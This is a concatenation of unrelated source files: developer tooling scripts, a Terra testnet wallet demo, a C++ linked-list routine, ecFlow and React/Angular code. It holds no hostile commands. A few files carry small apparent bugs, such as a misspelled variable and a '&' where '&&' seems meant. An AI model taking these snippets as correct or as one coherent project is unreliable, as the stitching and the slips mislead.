;;
#
# Unknown option
#
*)
UNKNOWN_OPTION="${i#*=}"
echo "Error: unknown option: $UNKNOWN_OPTION"
help
;;
esac
done
echo "Running bash on "
echo "CONTAINER_NAME = $CONTAINER_NAME"
echo "==================================================="
docker exec -i -t "${CONTAINER_NAME}" bash
|
#!/usr/bin/env bash
# Black + Clang formatter (if installed). This script formats all changed files from the last mergebase.
# You are encouraged to run this locally before pushing changes for review.
# Cause the script to exit if a single command fails
set -euo pipefail
FLAKE8_VERSION_REQUIRED="3.9.1"
BLACK_VERSION_REQUIRED="21.12b0"
SHELLCHECK_VERSION_REQUIRED="0.7.1"
MYPY_VERSION_REQUIRED="0.782"
BANNED_WORDS="RLLib Rllib"
check_banned_words() {
echo "Checking for common mis-spellings..."
for word in $BANNED_WORDS; do
if grep -C2 -R --include="*.py" --include="*.rst" "$word" .; then
echo "******************************"
echo "*** Misspelled word found! ***"
echo "******************************"
echo "Please fix the capitalization/spelling of \"$word\" in the above files."
exit 1
fi
done
}
check_python_command_exist() {
VERSION=""
case "$1" in
black)
VERSION=$BLACK_VERSION_REQUIRED
;;
flake8)
VERSION=$FLAKE8_VERSION_REQUIRED
;;
mypy)
VERSION=$MYPY_VERSION_REQUIRED
;;
*)
echo "$1 is not a required dependency"
exit 1
esac
if ! [ -x "$(command -v "$1")" ]; then
echo "$1 not installed. Install the python package with: pip install $1==$VERSION"
exit 1
fi
}
check_python_command_exist black
check_python_command_exist flake8
check_python_command_exist mypy
check_banned_words
# this stops git rev-parse from failing if we run this from the .git directory
builtin cd "$(dirname "${BASH_SOURCE:-$0}")"
ROOT="$(git rev-parse --show-toplevel)"
builtin cd "$ROOT" || exit 1
FLAKE8_VERSION=$(flake8 --version | head -n 1 | awk '{print $1}')
BLACK_VERSION=$(black --version | awk '{print $2}')
MYPY_VERSION=$(mypy --version | awk '{print $2}')
GOOGLE_JAVA_FORMAT_JAR=/tmp/google-java-format-1.7-all-deps.jar
# params: tool name, tool version, required version
tool_version_check() {
if [ "$2" != "$3" ]; then
echo "WARNING: Ray uses $1 $3, You currently are using $2. This might generate different results."
fi
}
tool_version_check "flake8" "$FLAKE8_VERSION" "$FLAKE8_VERSION_REQUIRED"
tool_version_check "black" "$BLACK_VERSION" "$BLACK_VERSION_REQUIRED"
tool_version_check "mypy" "$MYPY_VERSION" "$MYPY_VERSION_REQUIRED"
if command -v shellcheck >/dev/null; then
SHELLCHECK_VERSION=$(shellcheck --version | awk '/^version:/ {print $2}')
tool_version_check "shellcheck" "$SHELLCHECK_VERSION" "$SHELLCHECK_VERSION_REQUIRED"
else
echo "INFO: Ray uses shellcheck for shell scripts, which is not installed. You may install shellcheck=$SHELLCHECK_VERSION_REQUIRED with your system package manager."
fi
if command -v clang-format >/dev/null; then
CLANG_FORMAT_VERSION=$(clang-format --version | awk '{print $3}')
tool_version_check "clang-format" "$CLANG_FORMAT_VERSION" "12.0.0"
else
echo "WARNING: clang-format is not installed!"
fi
if command -v java >/dev/null; then
if [ ! -f "$GOOGLE_JAVA_FORMAT_JAR" ]; then
echo "Java code format tool google-java-format.jar is not installed, start to install it."
wget https://github.com/google/google-java-format/releases/download/google-java-format-1.7/google-java-format-1.7-all-deps.jar -O "$GOOGLE_JAVA_FORMAT_JAR"
fi
else
echo "WARNING:java is not installed, skip format java files!"
fi
if [[ $(flake8 --version) != *"flake8_quotes"* ]]; then
echo "WARNING: Ray uses flake8 with flake8_quotes. Might error without it. Install with: pip install flake8-quotes"
fi
if [[ $(flake8 --version) != *"flake8-bugbear"* ]]; then
echo "WARNING: Ray uses flake8 with flake8-bugbear. Might error without it. Install with: pip install flake8-bugbear"
fi
SHELLCHECK_FLAGS=(
--exclude=1090 # "Can't follow non-constant source. Use a directive to specify location."
--exclude=1091 # "Not following {file} due to some error"
--exclude=2207 # "Prefer mapfile or read -a to split command output (or quote to avoid splitting)." -- these aren't compatible with macOS's old Bash
)
# TODO(dmitri): When more of the codebase is typed properly, the mypy flags
# should be set to do a more stringent check.
MYPY_FLAGS=(
'--follow-imports=skip'
'--ignore-missing-imports'
)
MYPY_FILES=(
# Relative to python/ray
'autoscaler/node_provider.py'
'autoscaler/sdk/__init__.py'
'autoscaler/sdk/sdk.py'
'autoscaler/_private/commands.py'
# TODO(dmitri) Fails with meaningless error, maybe due to a bug in the mypy version
# in the CI. Type check once we get serious about type checking:
#'ray_operator/operator.py'
'ray_operator/operator_utils.py'
)
BLACK_EXCLUDES=(
'--extend-exclude' 'python/ray/cloudpickle/*'
'--extend-exclude' 'python/build/*'
'--extend-exclude' 'python/ray/core/src/ray/gcs/*'
'--extend-exclude' 'python/ray/thirdparty_files/*'
'--extend-exclude' 'python/ray/_private/thirdparty/*'
)
GIT_LS_EXCLUDES=(
':(exclude)python/ray/cloudpickle/'
':(exclude)python/ray/_private/runtime_env/_clonevirtualenv.py'
)
JAVA_EXCLUDES=(
'java/api/src/main/java/io/ray/api/ActorCall.java'
'java/api/src/main/java/io/ray/api/PyActorCall.java'
'java/api/src/main/java/io/ray/api/RayCall.java'
)
JAVA_EXCLUDES_REGEX=""
for f in "${JAVA_EXCLUDES[@]}"; do
JAVA_EXCLUDES_REGEX="$JAVA_EXCLUDES_REGEX|(${f//\//\/})"
done
JAVA_EXCLUDES_REGEX=${JAVA_EXCLUDES_REGEX#|}
# TODO(barakmich): This should be cleaned up. I've at least excised the copies
# of these arguments to this location, but the long-term answer is to actually
# make a flake8 config file
FLAKE8_PYX_IGNORES="--ignore=C408,E121,E123,E126,E211,E225,E226,E227,E24,E704,E999,W503,W504,W605"
shellcheck_scripts() {
shellcheck "${SHELLCHECK_FLAGS[@]}" "$@"
}
# Runs mypy on each argument in sequence. This is different than running mypy
# once on the list of arguments.
mypy_on_each() {
pushd python/ray
for file in "$@"; do
echo "Running mypy on $file"
mypy ${MYPY_FLAGS[@]+"${MYPY_FLAGS[@]}"} "$file"
done
popd
}
# Format specified files
format_files() {
local shell_files=() python_files=() bazel_files=()
local name
for name in "$@"; do
local base="${name%.*}"
local suffix="${name#${base}}"
local shebang=""
read -r shebang < "${name}" || true
case "${shebang}" in
'#!'*)
shebang="${shebang#/usr/bin/env }"
shebang="${shebang%% *}"
shebang="${shebang##*/}"
;;
esac
if [ "${base}" = "WORKSPACE" ] || [ "${base}" = "BUILD" ] || [ "${suffix}" = ".BUILD" ] || [ "${suffix}" = ".bazel" ] || [ "${suffix}" = ".bzl" ]; then
bazel_files+=("${name}")
elif [ -z "${suffix}" ] && [ "${shebang}" != "${shebang#python}" ] || [ "${suffix}" != "${suffix#.py}" ]; then
python_files+=("${name}")
elif [ -z "${suffix}" ] && [ "${shebang}" != "${shebang%sh}" ] || [ "${suffix}" != "${suffix#.sh}" ]; then
shell_files+=("${name}")
else
echo "error: failed to determine file type: ${name}" 1>&2
return 1
fi
done
if [ 0 -lt "${#python_files[@]}" ]; then
black "${python_files[@]}"
fi
if command -v shellcheck >/dev/null; then
if shellcheck --shell=sh --format=diff - < /dev/null; then
if [ 0 -lt "${#shell_files[@]}" ]; then
local difference
difference="$(shellcheck_scripts --format=diff "${shell_files[@]}" || true && printf "-")"
difference="${difference%-}"
printf "%s" "${difference}" | patch -p1
fi
else
echo "error: this version of shellcheck does not support diffs"
fi
fi
}
format_all_scripts() {
command -v flake8 &> /dev/null;
HAS_FLAKE8=$?
echo "$(date)" "Black...."
git ls-files -- '*.py' "${GIT_LS_EXCLUDES[@]}" | xargs -P 10 \
black "${BLACK_EXCLUDES[@]}"
echo "$(date)" "MYPY...."
mypy_on_each "${MYPY_FILES[@]}"
if [ $HAS_FLAKE8 ]; then
echo "$(date)" "Flake8...."
git ls-files -- '*.py' "${GIT_LS_EXCLUDES[@]}" | xargs -P 5 \
flake8 --config=.flake8
git ls-files -- '*.pyx' '*.pxd' '*.pxi' "${GIT_LS_EXCLUDES[@]}" | xargs -P 5 \
flake8 --config=.flake8 "$FLAKE8_PYX_IGNORES"
fi
if command -v shellcheck >/dev/null; then
local shell_files non_shell_files
non_shell_files=($(git ls-files -- ':(exclude)*.sh'))
shell_files=($(git ls-files -- '*.sh'))
if [ 0 -lt "${#non_shell_files[@]}" ]; then
shell_files+=($(git --no-pager grep -l -- '^#!\(/usr\)\?/bin/\(env \+\)\?\(ba\)\?sh' "${non_shell_files[@]}" || true))
fi
if [ 0 -lt "${#shell_files[@]}" ]; then
echo "$(date)" "shellcheck scripts...."
shellcheck_scripts "${shell_files[@]}"
fi
fi
}
# Format all files, and print the diff to stdout for travis.
# Mypy is run only on files specified in the array MYPY_FILES.
format_all() {
format_all_scripts "${@}"
echo "$(date)" "clang-format...."
if command -v clang-format >/dev/null; then
git ls-files -- '*.cc' '*.h' '*.proto' "${GIT_LS_EXCLUDES[@]}" | xargs -P 5 clang-format -i
fi
echo "$(date)" "format java...."
if command -v java >/dev/null & [ -f "$GOOGLE_JAVA_FORMAT_JAR" ]; then
git ls-files -- '*.java' "${GIT_LS_EXCLUDES[@]}" | sed -E "\:$JAVA_EXCLUDES_REGEX:d" | xargs -P 5 java -jar "$GOOGLE_JAVA_FORMAT_JAR" -i
fi
echo "$(date)" "done!"
}
# Format files that differ from main branch. Ignores dirs that are not slated
# for autoformat yet.
format_changed() {
# The `if` guard ensures that the list of filenames is not empty, which
# could cause the formatter to receive 0 positional arguments, making
# Black error.
#
# `diff-filter=ACRM` and $MERGEBASE is to ensure we only format files that
# exist on both branches.
MERGEBASE="$(git merge-base upstream/master HEAD)"
if ! git diff --diff-filter=ACRM --quiet --exit-code "$MERGEBASE" -- '*.py' &>/dev/null; then
git diff --name-only --diff-filter=ACRM "$MERGEBASE" -- '*.py' | xargs -P 5 \
black "${BLACK_EXCLUDES[@]}"
if which flake8 >/dev/null; then
git diff --name-only --diff-filter=ACRM "$MERGEBASE" -- '*.py' | xargs -P 5 \
flake8 --config=.flake8
fi
fi
if ! git diff --diff-filter=ACRM --quiet --exit-code "$MERGEBASE" -- '*.pyx' '*.pxd' '*.pxi' &>/dev/null; then
if which flake8 >/dev/null; then
git diff --name-only --diff-filter=ACRM "$MERGEBASE" -- '*.pyx' '*.pxd' '*.pxi' | xargs -P 5 \
flake8 --config=.flake8 "$FLAKE8_PYX_IGNORES"
fi
fi
if which clang-format >/dev/null; then
if ! git diff --diff-filter=ACRM --quiet --exit-code "$MERGEBASE" -- '*.cc' '*.h' &>/dev/null; then
git diff --name-only --diff-filter=ACRM "$MERGEBASE" -- '*.cc' '*.h' | xargs -P 5 \
clang-format -i
fi
fi
if command -v java >/dev/null & [ -f "$GOOGLE_JAVA_FORMAT_JAR" ]; then
if ! git diff --diff-filter=ACRM --quiet --exit-code "$MERGEBASE" -- '*.java' &>/dev/null; then
git diff --name-only --diff-filter=ACRM "$MERGEBASE" -- '*.java' | sed -E "\:$JAVA_EXCLUDES_REGEX:d" | xargs -P 5 java -jar "$GOOGLE_JAVA_FORMAT_JAR" -i
fi
fi
if command -v shellcheck >/dev/null; then
local shell_files non_shell_files
non_shell_files=($(git diff --name-only --diff-filter=ACRM "$MERGEBASE" -- ':(exclude)*.sh'))
shell_files=($(git diff --name-only --diff-filter=ACRM "$MERGEBASE" -- '*.sh'))
if [ 0 -lt "${#non_shell_files[@]}" ]; then
shell_files+=($(git --no-pager grep -l -- '^#!\(/usr\)\?/bin/\(env \+\)\?\(ba\)\?sh' "${non_shell_files[@]}" || true))
fi
if [ 0 -lt "${#shell_files[@]}" ]; then
shellcheck_scripts "${shell_files[@]}"
fi
fi
}
# This flag formats individual files. --files *must* be the first command line
# arg to use this option.
if [ "${1-}" == '--files' ]; then
format_files "${@:2}"
# If `--all` or `--scripts` are passed, then any further arguments are ignored.
# Format the entire python directory and other scripts.
elif [ "${1-}" == '--all-scripts' ]; then
format_all_scripts "${@}"
if [ -n "${FORMAT_SH_PRINT_DIFF-}" ]; then git --no-pager diff; fi
# Format the all Python, C++, Java and other script files.
elif [ "${1-}" == '--all' ]; then
format_all "${@}"
if [ -n "${FORMAT_SH_PRINT_DIFF-}" ]; then git --no-pager diff; fi
else
# Add the upstream remote if it doesn't exist
if ! git remote -v | grep -q upstream; then
git remote add 'upstream' 'https://github.com/ray-project/ray.git'
fi
# Only fetch master since that's the branch we're diffing against.
git fetch upstream master || true
# Format only the files that changed in last commit.
format_changed
fi
# Ensure import ordering
# Make sure that for every import psutil; import setproctitle
# There's a import ray above it.
PYTHON_EXECUTABLE=${PYTHON_EXECUTABLE:-python}
$PYTHON_EXECUTABLE ci/lint/check_import_order.py . -s ci -s python/ray/thirdparty_files -s python/build -s lib
if ! git diff --quiet &>/dev/null; then
echo 'Reformatted changed files. Please review and stage the changes.'
echo 'Files updated:'
echo
git --no-pager diff --name-only
exit 1
fi
|
<gh_stars>1-10
import {
ConnectType,
CreateTxFailed,
NetworkInfo,
Timeout,
TxFailed,
TxResult,
TxUnspecifiedError,
UserDenied,
WalletController,
WalletStatus,
} from '@terra-money/wallet-provider';
import { combineLatest } from 'rxjs';
import { LCDClient, MsgSend, StdFee } from '@terra-money/terra.js';
const mainnet = {
name: 'mainnet',
chainID: 'columbus-4',
lcd: 'https://lcd.terra.dev',
};
const testnet = {
name: 'testnet',
chainID: 'tequila-0004',
lcd: 'https://tequila-lcd.terra.dev',
};
const walletConnectChainIds: Record<number, NetworkInfo> = {
0: testnet,
1: mainnet,
};
const controller = new WalletController({
defaultNetwork: testnet,
walletConnectChainIds,
});
const toAddress = 'terra12hnhh5vtyg5juqnzm43970nh4fw42pt27nw9g9';
combineLatest([
controller.availableConnectTypes(),
controller.availableInstallTypes(),
controller.states(),
]).subscribe(([availableConnectTypes, availableInstallTypes, states]) => {
// ---------------------------------------------
// connect
// ---------------------------------------------
const connectContainer = document.querySelector('#connect-sample')!;
const connectPre = connectContainer.querySelector('section > pre')!;
const connectFooter = connectContainer.querySelector('footer')!;
if (connectPre) {
connectPre.textContent = JSON.stringify(
{
availableConnectTypes,
availableInstallTypes,
states,
},
null,
2,
);
}
connectFooter.innerHTML = '';
switch (states.status) {
case WalletStatus.WALLET_NOT_CONNECTED:
for (const installType of availableInstallTypes) {
const button = document.createElement('button');
button.textContent = `Install ${installType}`;
button.addEventListener('click', () => {
controller.install(installType);
});
connectFooter.appendChild(button);
}
for (const connectType of availableConnectTypes) {
const button = document.createElement('button');
button.textContent = `Connect ${connectType}`;
button.addEventListener('click', () => {
controller.connect(connectType);
});
connectFooter.appendChild(button);
}
break;
case WalletStatus.WALLET_CONNECTED:
const button = document.createElement('button');
button.textContent = `Disconnect`;
button.addEventListener('click', () => {
controller.disconnect();
});
connectFooter.appendChild(button);
break;
}
// ---------------------------------------------
// query
// ---------------------------------------------
const queryContainer = document.querySelector('#query-sample')!;
const queryPre = queryContainer.querySelector('section > pre')!;
switch (states.status) {
case WalletStatus.WALLET_NOT_CONNECTED:
queryPre.textContent = 'Wallet not connected!';
break;
case WalletStatus.WALLET_CONNECTED:
const lcd = new LCDClient({
URL: states.network.lcd,
chainID: states.network.chainID,
});
lcd.bank.balance(states.wallets[0].terraAddress).then((coins) => {
queryPre.textContent = coins.toString();
});
}
// ---------------------------------------------
// tx
// ---------------------------------------------
const txContainer = document.querySelector('#tx-sample')!;
const txPre = txContainer.querySelector('section > pre')!;
const txFooter = txContainer.querySelector('footer')!;
txFooter.innerHTML = '';
switch (states.status) {
case WalletStatus.WALLET_NOT_CONNECTED:
txPre.textContent = `Wallet not connected`;
break;
case WalletStatus.WALLET_CONNECTED:
if (states.wallets[0].connectType === ConnectType.READONLY) {
txPre.textContent = `Can't post Tx!`;
} else {
txPre.textContent = '';
const send = () => {
if (states.network.chainID.startsWith('columbus')) {
alert(`Please only execute this example on Testnet`);
return;
}
controller
.post({
fee: new StdFee(1000000, '200000uusd'),
msgs: [
new MsgSend(states.wallets[0].terraAddress, toAddress, {
uusd: 1000000,
}),
],
})
.then((nextTxResult: TxResult) => {
txPre.textContent = JSON.stringify(nextTxResult, null, 2);
})
.catch((error: unknown) => {
if (error instanceof UserDenied) {
txPre.textContent = 'User Denied';
} else if (error instanceof CreateTxFailed) {
txPre.textContent = 'Create Tx Failed: ' + error.message;
} else if (error instanceof TxFailed) {
txPre.textContent = 'Tx Failed: ' + error.message;
} else if (error instanceof Timeout) {
txPre.textContent = 'Timeout';
} else if (error instanceof TxUnspecifiedError) {
txPre.textContent = 'Unspecified Error: ' + error.message;
} else {
txPre.textContent =
'Unknown Error: ' +
(error instanceof Error ? error.message : String(error));
}
});
};
const button = document.createElement('button');
button.textContent = `Send 1USD to ${toAddress}`;
button.addEventListener('click', () => {
send();
});
txFooter.appendChild(button);
}
break;
}
});
|
Node *addTwoLists(Node* first, Node* second)
{
Node* res = NULL; // res is head node of resultant list
Node *temp, *prev = NULL;
int carry = 0, sum;
while (first != NULL || second != NULL) //while both lists exist
{
// Calculate value of next digit in resultant list.
// The next digit is sum of following things
// (i) Carry
// (ii) Next digit of first list (if ther is a next digit)
// (ii) Next digit of second list (if ther is a next digit)
sum = carry + (first? first->data: 0) + (second? second->data: 0);
// update carry for next calculation
carry = (sum >= 10)? 1 : 0;
// update sum if it is greater than 10
sum = sum % 10;
// Create a new node with sum as data
temp = new Node(sum);
// if this is the first node then set it as head of resultant list
if(res == NULL)
res = temp;
else // If this is not the first node then connect it to the rest.
prev->next = temp;
// Set prev for next insertion
prev = temp;
// Move first and second pointers to next nodes
if (first) first = first->next;
if (second) second = second->next;
}
if (carry > 0) temp->next = new Node(carry);
// return head of the resultant list
return res;
} |
#!/bin/bash
sleepi3ctl set measurement-interval 10
sleepi3ctl set restore-voltage $THRESHOLD
|
#!/bin/bash
yandex-disk status ; date ;
yandex-disk sync ; date ; ls -lh /home/ff/yd.master ; date ;
echo 'Main sync service task ended' '--' $(date) ;
|
#!/bin/sh
#
# CDDL HEADER START
#
# The contents of this file are subject to the terms of the
# Common Development and Distribution License, Version 1.0 only
# (the "License"). You may not use this file except in compliance
# with the License.
#
# You can obtain a copy of the license at usr/src/OPENSOLARIS.LICENSE
# or http://www.opensolaris.org/os/licensing.
# See the License for the specific language governing permissions
# and limitations under the License.
#
# When distributing Covered Code, include this CDDL HEADER in each
# file and include the License file at usr/src/OPENSOLARIS.LICENSE.
# If applicable, add the following below this CDDL HEADER, with the
# fields enclosed by brackets "[]" replaced with your own identifying
# information: Portions Copyright [yyyy] [name of copyright owner]
#
# CDDL HEADER END
#
#
# Copyright 2003 Sun Microsystems, Inc. All rights reserved.
# Use is subject to license terms.
#
#ident "%Z%%M% %I% %E% SMI"
BSDECHO=-e
echo ${BSDECHO} "\
/*\n\
* Copyright 2003 Sun Microsystems, Inc. All rights reserved.\n\
* Use is subject to license terms.\n\
*/\n\
\n\
#pragma ident\t\"%Z%%M%\t%I%\t%E% SMI\"\n\
\n\
#include <dt_errtags.h>
\n\
static const char *const _dt_errtags[] = {"
pattern='^ \(D_[A-Z0-9_]*\),*'
replace=' "\1",'
sed -n "s/$pattern/$replace/p" || exit 1
echo ${BSDECHO} "\
};\n\
\n\
static const int _dt_ntag = sizeof (_dt_errtags) / sizeof (_dt_errtags[0]);\n\
\n\
const char *
dt_errtag(dt_errtag_t tag)
{
return (_dt_errtags[(tag > 0 && tag < _dt_ntag) ? tag : 0]);
}"
exit 0
|
#!/bin/bash
# At the top of every module. This will gather a usage message to share with the
# user if we abend.
function homeport() {
[ "$1" == "module" ] || fail "invalid argument to homeport"
local message; local spaces;
IFS="\000" read -r -d'\000' message && true
spaces=$(
echo "$message" | sed -e '/^$/d' -e 's/^\( *\).*/\1/' | \
sed -e '1h;H;g;s/[^\n]/#/g;s/\(#*\)\n\1/\n/;G;/^\n/s/\n.*\n\(.*\)\n.*/\1/;s/.*\n//;h;$!d'
)
USAGE="$(echo "$message" | sed -e "s/^$spaces//")"
}
# TODO: Not used.
function homeport_absolutize() {
expanded=$(cd ${1/*} && homeport_readlink $1)
readlink $1 1>&2
echo x $expanded 1>&2
base=${expanded##*/}
dir=$(cd ${expanded%/*} && pwd -P)
echo "$dir/$base"
}
function usage() {
local code=$1
echo "$USAGE"
exit $code
}
function abend() {
local message=$1
echo "error: $message"
usage 1
}
function homeport_get_hops_and_tag() {
hompeort_hops=()
while [ $# -ne 0 ]; do
if [[ "$1" = *@* ]]; then
homeport_hops+=("$1")
shift
else
break
fi
done
homeport_get_tag "$@"
}
function homeport_get_tag() {
[ -z "$1" ] && abend "Tag name required"
homeport_tag=$1
shift
if [[ "$homeport_tag" = *@* ]]; then
homeport_unix_user=${homeport_tag%@*}
homeport_tag=${homeport_tag#*@}
else
homeport_unix_user=$USER
fi
homeport_image="homeport/image-${homeport_tag}"
homeport_home_container="homeport-home-${homeport_unix_user}"
homeport_container="homeport-${homeport_tag}"
if [ $# -eq 0 ]; then
homeport_argv=''
else
printf -v homeport_argv ' %q' "$@"
fi
}
function homeport_select_image() {
[ -z "$1" ] && abend "Tag name required"
homeport_tag=$1
homeport_image="homeport/image-${homeport_tag}"
homeport_container="homeport-${homeport_tag}"
}
function homeport_ssh_config() {
dir=$1
fetch=
if [ ${#homeport_hops[@]} -eq 0 ]; then
touch "$dir/config"
else
separator=
for hop in "${homeport_hops[@]}"; do
fetch+=$separator
separator=' '
ssh_host=${hop#*@}
ssh_port=${ssh_host#*:}
if [ "$ssh_port" = "$ssh_host" ]; then
ssh_port=22
fi
ssh_host=${ssh_host%:*}
ssh_user=${hop%@*}
fetch+="ssh -A -p $ssh_port -l $ssh_user $ssh_host"
done
proxy_command="ProxyCommand $fetch -W %h:%p 2> /dev/null" >> "$dir/config"
fi
homeport_known_hosts=$(homeport_evaluatable known-hosts $homeport_tag | $fetch bash 2> /dev/null)
IFS=: read -ra destination <<< "$(echo "$homeport_known_hosts" | sed 's/\[\([0-9.]*\)\]:\([0-9]*\).*/\1:\2/')"
echo "$homeport_known_hosts" > "$dir/known_hosts"
echo "Host ${destination[0]}" >> "$dir/config"
echo "Port ${destination[1]}" >> "$dir/config"
echo "UserKnownHostsFile $dir/known_hosts" >> "$dir/config"
echo "$proxy_command" >> "$dir/config"
}
|
/////////1/////////2/////////3/////////4/////////5/////////6/////////7/////////8
// Name :
// Author : Avi
// Revision : $Revision: #18 $
//
// Copyright 2009-2020 ECMWF.
// This software is licensed under the terms of the Apache Licence version 2.0
// which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
// In applying this licence, ECMWF does not waive the privileges and immunities
// granted to it by virtue of its status as an intergovernmental organisation
// nor does it submit to any jurisdiction.
//
// Description :
/////////1/////////2/////////3/////////4/////////5/////////6/////////7/////////8
#include "GroupSTCCmd.hpp"
#include "ClientToServerCmd.hpp"
#include "Defs.hpp"
#include "Log.hpp"
#include "PrintStyle.hpp"
#include "WhyCmd.hpp"
#include "Task.hpp"
#include "Family.hpp"
#include "Suite.hpp"
using namespace ecf;
using namespace std;
using namespace boost;
std::string GroupSTCCmd::print() const
{
return "cmd:GroupSTCCmd";
}
bool GroupSTCCmd::equals(ServerToClientCmd* rhs) const
{
auto* the_rhs = dynamic_cast< GroupSTCCmd* > ( rhs );
if ( !the_rhs ) return false;
const std::vector<STC_Cmd_ptr>& rhsCmdVec = the_rhs->cmdVec();
if (cmdVec_.size() != rhsCmdVec.size()) return false;
for(size_t i = 0; i < cmdVec_.size(); i++) {
if ( !cmdVec_[i]->equals( rhsCmdVec[i].get() ) ) {
return false;
}
}
return ServerToClientCmd::equals(rhs);
}
bool GroupSTCCmd::handle_server_response( ServerReply& server_reply, Cmd_ptr cts_cmd, bool debug ) const
{
if (debug) std::cout << " GroupSTCCmd::handle_server_response\n";
bool ret_flag = true;
for(STC_Cmd_ptr subCmd: cmdVec_) {
if (!subCmd->handle_server_response(server_reply, cts_cmd, debug)) ret_flag = false; // one of the commands failed
}
if (!server_reply.cli()) return ret_flag;
/// CLI called from the command line.
/// This assumes the DefsCmd::handle_server_response() | SNodeCmd::handle_server_response has been called
/// this will populate ServerReply with the defs/node returned from the server
defs_ptr defs = server_reply.client_defs();
node_ptr node = server_reply.client_node();
if ( defs.get() || node.get() ) {
if (debug) std::cout << " GroupSTCCmd::handle_server_response *get* | *sync* | *sync_full* called\n";
/// client --group="get; show" # where get will call DefsCmd will return defs, from the server
/// client --group="get; show state" # where get will call DefsCmd will return defs, from the server
/// client --group="get /s1; show state" # where get will call DefsCmd will return defs, from the server
/// client --group="sync_full; show" # similar to get return defs, from the server
/// client --group="sync 1 0 0; show" # where sync will call SyncCmd will return defs, from the server
/// # will return those suites with handle 1
// Print out the data that was received from server. as a part of get request.
// The server cannot do a show, it MUST be done at the Client side
// The show request is only valid if the out bound request to the server
PrintStyle::Type_t style = cts_cmd->show_style();
if ( style != PrintStyle::NOTHING ) {
if (debug) std::cout << " GroupSTCCmd::handle_server_response *show* was called " << PrintStyle::to_string(style) << "\n";
PrintStyle print_style(style);
if (defs.get()) {
/// Auto generate externs, before writing to standard out. This can be expensive since
/// All the trigger references need to to be resolved. & AST need to be created first
/// The old spirit based parsing is horrendously, slow. Can't use Spirit QI, till IBM support it
if (!PrintStyle::is_persist_style(cts_cmd->show_style())) {
defs->auto_add_externs();
}
std::cout << *defs.get();
}
else {
if (node.get()) {
Suite* suite = node->isSuite();
if (suite) std::cout << *suite << "\n";
Family* fam = node->isFamily();
if (fam) std::cout << *fam << "\n";
Task* task = node->isTask();
if (task) std::cout << *task << "\n";
}
}
}
}
std::string nodePath;
if (cts_cmd->why_cmd(nodePath) && defs.get()) {
if (debug) std::cout << " GroupSTCCmd::handle_server_response *why* was called\n";
/// client --group="get; why" # where get will call DefsCmd will return defs, from the server
/// client --group="get; why <path>" # where get will call DefsCmd will return defs, from the server
WhyCmd cmd(defs, nodePath);
std::cout << cmd.why() << "\n";
}
return ret_flag;
}
void GroupSTCCmd::addChild(STC_Cmd_ptr childCmd)
{
LOG_ASSERT(childCmd.get(),""); // Dont add NULL children
cmdVec_.push_back(childCmd);
}
// these two must be opposite of each other
bool GroupSTCCmd::ok() const
{
for(const auto & i : cmdVec_) {
if (!i->ok()) return false; // if child is ErrorCmd will return false
}
return true;
}
void GroupSTCCmd::cleanup()
{
/// After the command has run this function can be used to reclaim memory
for(auto & cmd : cmdVec_) {
cmd->cleanup();
}
}
std::string GroupSTCCmd::error() const
{
std::string ret;
for(const auto & i : cmdVec_) {
std::string error_str = i->error();
if (!error_str.empty()) {
ret += error_str;
ret += "\n";
}
}
return ret;
}
std::ostream& operator<<(std::ostream& os, const GroupSTCCmd& c) { os << c.print(); return os; }
|
import {connect} from "react-redux";
import Warzone from "../components/Warzone";
import {TOAST_SHOW} from "../actions/toasts";
import {ACTIVE_USER_SWAP, USER_CLEAR_ACTIVE} from "../actions/users";
import {SWITCH_MOVE} from "../actions/switch";
const mapStateToProps = ({users, globalState, switchButton, coalitions}) => {
return {
users,
user_metadata: users.user_metadata,
mode: globalState.mode,
switchButton: {
position: switchButton.position
},
coalitions: coalitions.coalitions
};
};
const mapDispatchToProps = dispatch => {
return {
showToast: payload => dispatch({type: TOAST_SHOW, payload}),
storeActiveUsers: payload => dispatch({type: ACTIVE_USER_SWAP, payload}),
moveSwitch: payload => dispatch({type: SWITCH_MOVE, payload}),
clearActiveUser: () => dispatch({type: USER_CLEAR_ACTIVE}),
};
};
export default connect(mapStateToProps, mapDispatchToProps)(Warzone);
|
import { TestBed } from '@angular/core/testing';
import { RouterTestingModule } from '@angular/router/testing';
import { ActivatedRoute } from '@angular/router';
import { By } from '@angular/platform-browser';
import { Observable } from 'rxjs/Observable';
import { AppModule } from '../app.module';
import { LiveComponent } from './live.component';
import { RaceService } from '../race.service';
import { PonyComponent } from '../pony/pony.component';
describe('LiveComponent', () => {
const fakeRaceService = jasmine.createSpyObj('RaceService', ['get', 'live']);
fakeRaceService.get.and.returnValue(Observable.of({
id: 1,
name: 'Lyon',
ponies: [],
startInstant: '2016-02-18T08:02:00Z'
}));
fakeRaceService.live.and.returnValue(Observable.of([]));
const fakeActivatedRoute = { snapshot: { params: { raceId: 1 } } };
beforeEach(() => TestBed.configureTestingModule({
imports: [AppModule, RouterTestingModule],
providers: [
{ provide: RaceService, useValue: fakeRaceService },
{ provide: ActivatedRoute, useValue: fakeActivatedRoute }
]
}));
it('should display the title', () => {
const fixture = TestBed.createComponent(LiveComponent);
fixture.detectChanges();
const element = fixture.nativeElement;
const title = element.querySelector('h2');
expect(title).not.toBeNull('The template should display an h2 element with the race name inside');
expect(title.textContent).toContain('Lyon', 'The template should display an h2 element with the race name inside');
});
it('should subscribe to the live observable', () => {
const fixture = TestBed.createComponent(LiveComponent);
fixture.detectChanges();
const liveComponent: LiveComponent = fixture.componentInstance;
expect(fakeRaceService.live).toHaveBeenCalledWith(1);
expect(liveComponent.poniesWithPosition).not.toBeNull('poniesWithPosition should be initialized in the subscribe');
expect(liveComponent.positionSubscription).not.toBeNull('positionSubscription should store the subscription');
});
it('should unsubscribe on destruction', () => {
const fixture = TestBed.createComponent(LiveComponent);
fixture.detectChanges();
const liveComponent: LiveComponent = fixture.componentInstance;
spyOn(liveComponent.positionSubscription, 'unsubscribe');
liveComponent.ngOnDestroy();
expect(liveComponent.positionSubscription.unsubscribe).toHaveBeenCalled();
});
it('should display a div with a pony component per pony', () => {
const fixture = TestBed.createComponent(LiveComponent);
fixture.detectChanges();
const liveComponent: LiveComponent = fixture.componentInstance;
liveComponent.poniesWithPosition = [
{ id: 1, name: '<NAME>', color: 'BLUE', position: 10 },
{ id: 2, name: '<NAME>', color: 'Green', position: 40 }
];
fixture.detectChanges();
const element = fixture.nativeElement;
const divWithPonies = element.querySelectorAll('div.pony-wrapper');
expect(divWithPonies.length).toBe(2, 'You should display a `div` with a class `pony-wrapper` for each pony');
const debugElement = fixture.debugElement;
const ponyComponents = debugElement.queryAll(By.directive(PonyComponent));
